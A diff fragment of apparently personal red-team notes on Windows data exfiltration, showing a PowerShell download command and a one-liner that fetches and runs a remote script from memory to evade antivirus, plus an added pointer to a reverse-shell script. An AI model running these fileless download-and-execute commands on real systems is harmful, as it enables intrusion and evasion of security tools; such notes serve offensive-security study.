Print3M/print3m.github.io/_notes/windows/local/rt/data-exfiltration.md

 Invoke-WebRequest <URL> -OutFile <FILE>
 ```

 There's a method to download a PS script and run it without touching the disk (directly from memory).
 It's used to avoid antiviruses and so on.
+It can be used to get a reverse-shell connection ([reverse shell Powershell script](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1)).

 ```powershell
 iex (New-Object Net.WebClient).DownloadString("<URL_TO_SCRIPT.ps1>")